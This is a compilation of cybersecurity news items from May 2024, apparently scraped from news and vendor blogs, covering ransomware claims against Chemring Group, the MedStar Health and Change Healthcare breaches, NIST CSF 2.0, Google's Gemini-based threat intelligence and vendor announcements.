This incident adds to a growing list of healthcare breaches and ransomware attacks, including the Change Healthcare attack that caused widespread disruptions across the U.S. Initially described as an “enterprise-wide connectivity issue,” the severity of the attack escalated when Blackcat, also known as the Alphv ransomware gang, claimed responsibility for it. The Russia-based ransomware and extortion gang claimed to have stolen millions of Americans’ sensitive health and patient information, a tactic commonly employed by ransomware gangs to exert pressure on victims. However, on February 29, Blackcat withdrew its claim on the breached data of the healthcare group, raising questions about whether a ransom was paid. The company later confirmed that it paid a $22 million ransom, but it now faces multiple lawsuits for alleged negligence in safeguarding clients’ personal information. The parent company UnitedHealth has allocated over $2 billion to fight the fallout of the Change Healthcare data breach. The company last week also stated that a lack of multi-factor authentication (MFA) resulted in the massive hack.

In a related development, the U.S. Department of Health and Human Services (HHS) recently cautioned about threat actors employing social engineering tactics to target IT help desks in the Healthcare and Public Health (HPH) sector. These attackers employ deception to enroll new multi-factor authentication (MFA) devices under their control, thereby gaining access to corporate resources, the HHS warned.

Medusa Ransomware Claims UK-based Defense Solutions Provider Chemring Group as Victim

By: Alan J
9 May 2024 at 05:35

The Medusa ransomware group has demanded $3.5 million from the Chemring Group on their leak site, along with a looming threat to leak 186.78 GB of sensitive documents claimed to have been obtained from the Chemring Group data breach. The group set the negotiation deadline as May 16, 2024, giving the victim about 9 days to surrender to its demands, while also presenting additional options such as prolonging the negotiation period and removing or downloading the data allegedly stolen during the attack at varying prices. The Chemring Group is a multi-national UK-based business that provides a range of technology solutions and services to the aerospace, defence and security markets around the world. The Chemring Group data breach post was shared on the threat actor's data leak site along with 3 American organizations listed as victims. However, the authenticity of these claims is yet to be verified. While the Chemring Group refutes any major compromise, it has confirmed an ongoing investigation into the alleged data breach.

Medusa Hackers Demand $3.5 Million Following Chemring Group Data Breach

On the leak site, the ransomware group demanded a ransom of 3.5 million USD with a negotiation deadline of 16th May 2024. The group allegedly exfiltrated 186.78 GB of confidential documents, databases, and SolidWorks design files. However, no sample data had been shared, making it harder to verify the group's claims. Additionally, the leak site provided the victim with the options to add an additional day to the ransom negotiations for 1 million, to delete all the data for 3.5 million, or to download/delete the exfiltrated data for 3.5 million.

Image: Medusa ransomware group listing of the Chemring data breach (Source: X.com / @H4ckManac)

The Chemring Group PLC listing was also accompanied by the listing of three alleged victim organizations: One Toyota of Oakland, Merritt Properties and Autobell Car Wash. When contacted for additional details by The Cyber Express team, a Chemring Group spokesman made the following statement about the alleged ransomware attack:
Chemring has been made aware of a post that has appeared on X (formerly Twitter) alleging that the Group has been subject to a ransomware attack. An investigation has been launched, however there is currently nothing to indicate any compromise of the Group’s IT systems, nor have we received any communication from a threat actor suggesting that we have been breached. We confirm that all Chemring businesses are operating normally. Our preliminary investigations lead us to believe that this attack was on a business previously owned by Chemring but where there is no ongoing relationship or connection into our IT systems. As this is subject to an ongoing criminal investigation we cannot comment further at this stage.

Who is Medusa Ransomware Group?

The MedusaLocker ransomware group is known to have been active since September 2019. The group usually gains initial access to victims’ networks by exploiting known vulnerabilities in Remote Desktop Protocol (RDP). The Medusa ransomware group has been observed to increase its attack campaigns after the debut of its dedicated data leak site in February 2023. The group primarily targets healthcare, education and public-sector organizations in its campaigns. The group was previously responsible for an attack on Toyota in December 2023, in which the group obtained access to sensitive details such as names, addresses, contact information, lease-purchase details, and IBAN numbers. The incident prompted the company to adopt stronger data protection and notify affected customers, while reporting details of the breach to the relevant authorities.

Crypto Mixer Money Laundering: Samourai Founders Arrested

9 May 2024 at 03:00

The recent crackdown on the crypto mixer money laundering, Samourai, has unveiled a sophisticated operation allegedly involved in facilitating illegal transactions and laundering criminal proceeds. The cryptocurrency community was shocked by the sudden Samourai Wallet shutdown. The U.S Department of Justice (DoJ) revealed the arrest of two co-founders, shedding light on the intricacies of their […]


Major Changes in NIST Cybersecurity Framework 2.0: Enhancements and Adoption Strategies

The NIST Cybersecurity Framework (CSF) is a framework designed to provide cybersecurity risk-management guidance to private and public industries, government agencies, and other organizations. It is intended to be applicable for use by any organization regardless of its size or scale, age, or sector. Version 2.0 of the cybersecurity framework is much more extensive in its core guidance and lists additional subcategories as well as links to online resources that offer further guidance on practices to achieve these objectives. The guidance is divided into six areas of focus: identify, protect, detect, respond, recover, and govern. This article unravels the NIST Cybersecurity Framework, the major changes outlined in CSF 2.0, and some of the ways in which it can be adopted.

The NIST Cybersecurity Framework

Overview

The NIST Cybersecurity Framework (NIST CSF) was first introduced in 2014 by the National Institute of Standards and Technology to bolster the security of infrastructure within the United States by establishing a common set of standards, goals and terminology to reduce the risk and impact of cyberattacks. By promoting a shared framework, the NIST CSF aids better decision-making and encourages security standards that address threats such as phishing and ransomware. The initial version was updated to Version 1.1 in 2018, adopting major changes such as the inclusion of the Identify core function, additional subcategories and improved clarity. The draft of Version 2.0 was released for public feedback in August 2023 and closed for comments in November 2023; the final Version 2.0 was released in February 2024. Since the new framework is flexible enough to fit a wide range of situations, NIST recommends its voluntary adoption by organizations of all sizes.

Target Audience

The primary audience for the framework comprises individuals responsible for developing and overseeing cybersecurity planning and strategy within organizations. It is also relevant for other roles involved in risk management, such as executives, boards of directors, acquisition professionals, technology experts, risk managers, legal professionals, human resource specialists, and auditors who specialize in cybersecurity and risk management. Additionally, the CSF can serve as a useful asset to those involved in making and influencing private and public policy (e.g., associations, professional organizations, regulators) who establish and communicate priorities for cybersecurity risk management.

Major Changes in NIST Cybersecurity Framework 2.0

Released in February 2024, the NIST Cybersecurity Framework 2.0 is the latest revision to the framework.

Inclusion of 'Govern' Core Function

While the previous framework stated 'Identify, Protect, Detect, Respond, and Recover' as its core functions, the new framework adds 'Govern.' Govern seeks to address the establishment of cybersecurity strategy, cybersecurity supply chain risk management, roles, responsibilities, authorities, policy, and the oversight of cybersecurity strategy within the organizational context.

More Extensive Sub-categories and References within Core Functions

CSF version 2.0 includes additional categories and subcategories of cybersecurity goals and standards within the listed core functions, as well as hundreds of other helpful references to assist readers. The new framework is much more extensive with its definitions and resources.

Expanded Scope

The new framework’s scope has expanded beyond just the protection of critical infrastructure, such as water facilities and power plants, to providing safety standards for all organizations regardless of sector or size. This expanded scope is reflected in the change of the CSF’s official title to “The Cybersecurity Framework,” from the earlier “Framework for Improving Critical Infrastructure Cybersecurity.” This reflects an earlier request from the US Congress for the framework to expand its guidance to aid small businesses.

Framework Tiers

The framework tiers describe how an organization handles cybersecurity risk, allowing it to adopt the tier that best fulfills its objectives and reduces cyber risk to an acceptable level while accounting for the difficulty of implementation. The tiers progress from 1 ('Partial') to 4 ('Adaptive'), with each step bringing a higher level of sophistication but requiring additional implementation effort.

Framework Profiles

CSF profiles help organizations find the path that is right for them to reduce cybersecurity risk. Each profile lays out an organization’s “current” and “target” positions and the criteria to be met in moving from one to the other.

Focus on Supply-Chain and Third-Party Risk

The framework incorporates new supply chain guidelines as part of the core 'Govern' function and expects cybersecurity risks within software supply chains to be considered while an organization carries out its functions. Moreover, the framework reminds organizations to plan and conduct due diligence to reduce risk before entering agreements with suppliers or other third-party contractors.

Google Brings Gemini AI to Cybersecurity

Gemini AI, Google Gemini AI, Google Threat Intelligence

Google has brought together its Gemini AI model with its Mandiant cybersecurity unit and VirusTotal threat intelligence to make the threat landscape more accessible and to improve efficiency. The company also plans to use its Gemini 1.5 Pro large language model, released in February, to make threat reports easier to understand for a broader audience. At the RSA Conference in San Francisco, Google unveiled its latest AI-based solution to add more value to threat intelligence. Tackling the long-standing challenges of fragmented threat landscapes and cumbersome data collection processes, Google Threat Intelligence integrates Mandiant's frontline expertise, real-time contributions from VirusTotal's global community and Google's visibility into its extensive user and device footprint to deliver a comprehensive defense against evolving cyber threats. Bernardo Quintero, founder of VirusTotal, called this initiative a “sharing knowledge, protecting together” mission, which it has embraced with Google and Mandiant.
“I want to assure our entire community, from security researchers and industry partners to individual users, that VirusTotal's core mission remains unchanged. We remain deeply dedicated to collective intelligence and collaboration, fostering a platform where everyone can come together to share knowledge, access valuable threat information, and contribute to the fight against cyber threats,” Quintero said.
“VirusTotal remains committed to a level playing field, ensuring all partners, including Google Threat Intelligence, have equal access to the crowdsourced data VirusTotal collects. We also want to assure you that the core features and functionalities of VirusTotal will remain free and accessible to everyone, as always,” he added, clearing the air around VirusTotal’s future. “The strength of VirusTotal lies in its network of contributors and the vast amount of data they provide. This data serves as a valuable resource for the entire security industry, empowering our partners and others to enhance their products and contribute to a more secure digital world. This collaborative approach, based on transparency and equal access, strengthens the industry as a whole, ultimately leading to better protection for everyone.”

Challenges Addressed and Google’s Gemini AI Integration

For years, organizations have grappled with two primary hurdles in threat intelligence: a lack of holistic visibility into the threat landscape and the arduous task of collecting and operationalizing intelligence data. Google's new offering aims to address these challenges head-on, providing insights and operational efficiency to security teams worldwide. The integration of Gemini, Google's AI-powered agent, enhances the operationalization of threat intelligence, streamlining the analysis process and accelerating response times.

Using the Gemini 1.5 Pro large language model, Google claims to significantly reduce the time required to analyze malware attacks. For instance, the model took only 34 seconds to dissect the WannaCry virus and identify a kill switch, demonstrating its efficacy in threat analysis. Another key feature of Gemini AI is its ability to summarize threat reports into natural language, aiding companies in assessing the potential impact of attacks and prioritizing responses. Google Threat Intelligence also offers a comprehensive threat monitoring network, empowering users to gain insights into the cybersecurity landscape and prioritize their defense strategies.

The experts of Mandiant, which Google acquired in 2022, play a vital role in assessing security vulnerabilities in AI projects through the Secure AI Framework. They conduct rigorous testing to fortify AI models against threats like data poisoning, ensuring their resilience against malicious exploitation. While Google is pioneering the integration of AI into cybersecurity, other tech giants like Microsoft are also exploring similar avenues, underscoring the growing significance of AI in safeguarding digital assets against evolving threats. As cyber threats continue to evolve, proactive defense strategies are more critical than ever.

With Google Threat Intelligence, organizations can leverage cutting-edge technology to detect, analyze, and mitigate threats effectively, ensuring the security and resilience of their digital infrastructure in an increasingly complex threat landscape.

Heimdal Welcomes Jesper Frederiksen as Its New Chief Executive Officer

8 May 2024 at 11:53

Official Press Release Copenhagen, Denmark – May 8th, 2024 — Heimdal®, a global leader in cybersecurity solutions, is excited to announce the appointment of Jesper Frederiksen as its new Chief Executive Officer. Bringing a wealth of experience from the SaaS and cloud security sectors, Frederiksen is renowned for his expertise in scaling IT technology organizations and enhancing […]

The post Heimdal Welcomes Jesper Frederiksen as Its New Chief Executive Officer appeared first on Heimdal Security Blog.

MedStar Health Reports Data Breach Impacting 183,000 Patients

MedStar Health Data Breach

MedStar Health, a prominent non-profit healthcare provider, disclosed a data breach that impacts more than 183,000 patients across the hundreds of care locations it operates in the Baltimore-Washington area in the U.S. The not-for-profit healthcare provider is worth $7.7 billion and is one of the largest employers in the region, with more than 34,000 associates working across 300 care locations, including 10 hospitals and 33 urgent care clinics, ambulatory care centers and primary and specialty care providers, which together treat hundreds of thousands of patients each year. The impacted individuals' personal data may have been compromised when an outsider gained access to the emails and files of three employees, MedStar Health said in a statement on the data breach. MedStar Health reported notifying 183,709 affected patients via letters and filed a notice with the Department of Health and Human Services. The unauthorized access occurred sporadically between January and October last year, with patient information found in the breached files and emails. Although there is no indication that patient data was actually acquired or viewed, the company could not rule out such access. Patient information, including names, addresses, dates of birth, service dates, provider names and insurance details, was contained in the compromised emails and files, MedStar Health said. The healthcare provider urged affected patients to monitor healthcare statements for any unusual activity and said it has implemented new safeguards to prevent future breaches.

Earlier MedStar Health Data Breach

The digital woes of the healthcare provider are not new. In fact, this is the second time in a decade that MedStar Health has faced a massive data breach scare. In 2016, a virus, likely ransomware, infected MedStar Health's computer network. This prompted a complete shutdown of services for the healthcare giant, which resulted in new patients being diverted to other hospitals while caregivers had to resort to pen and paper to continue regular operations. The impact was such that the FBI was called in to investigate the MedStar Health data breach, which followed similar cyberattacks on at least three other medical institutions in California and Kentucky.

Healthcare Breaches on the Rise

This incident adds to a growing list of healthcare breaches and ransomware attacks, including the Change Healthcare attack that caused widespread disruptions across the U.S. Initially described as an “enterprise-wide connectivity issue,” the attack's severity became clear when the Blackcat ransomware gang, also known as Alphv, claimed responsibility for it. The Russia-based ransomware and extortion gang claimed to have stolen millions of Americans’ sensitive health and patient information, a tactic commonly employed by ransomware gangs to exert pressure on victims. However, on February 29, Blackcat withdrew its claim on the healthcare group's breached data, raising questions about whether a ransom was paid. The company later confirmed that it paid a $22 million ransom, but it now faces multiple lawsuits for alleged negligence in safeguarding clients' personal information. The parent company, UnitedHealth, has allocated over $2 billion to fight the fallout of the Change Healthcare data breach. The company last week also stated that a lack of multi-factor authentication (MFA) resulted in the massive hack. In September 2023, Blackcat claimed a similar data breach on McLaren Healthcare, where nearly 6 terabytes worth of data was siphoned. Owing to such large-scale healthcare data breaches, the U.S. Cybersecurity and Infrastructure Security Agency in March unveiled a cybersecurity toolkit for the healthcare sector to help organizations implement advanced tools that fortify their defenses against evolving threats.

20+ Xiaomi Vulnerabilities Put Users’ Data and Devices at Risk

8 May 2024 at 08:38

Researchers warn that Xiaomi devices are vulnerable to over 20 critical issues affecting applications and system components. Security specialists notified the vendor regarding the flaws at the end of April 2023. For the moment, Xiaomi didn’t manage to fix all of them. What are the vulnerable Xiaomi apps? The Xiaomi vulnerabilities impact applications that common […]

The post 20+ Xiaomi Vulnerabilities Put Users’ Data and Devices at Risk appeared first on Heimdal Security Blog.

Heimdal Teams Up with DACTA to Strengthen Cybersecurity in the APAC Region

30 April 2024 at 06:42

We’re excited to announce our latest venture, a strategic partnership with DACTA that promises to strengthen cybersecurity defenses across the Asia-Pacific (APAC) region. This collaboration is a testament to Heimdal’s dedication to pushing the boundaries of cybersecurity and extending our innovative solutions to new markets, with DACTA’s unparalleled regional expertise leading the charge. The synergy […]

The post Heimdal Teams Up with DACTA to Strengthen Cybersecurity in the APAC Region appeared first on Heimdal Security Blog.
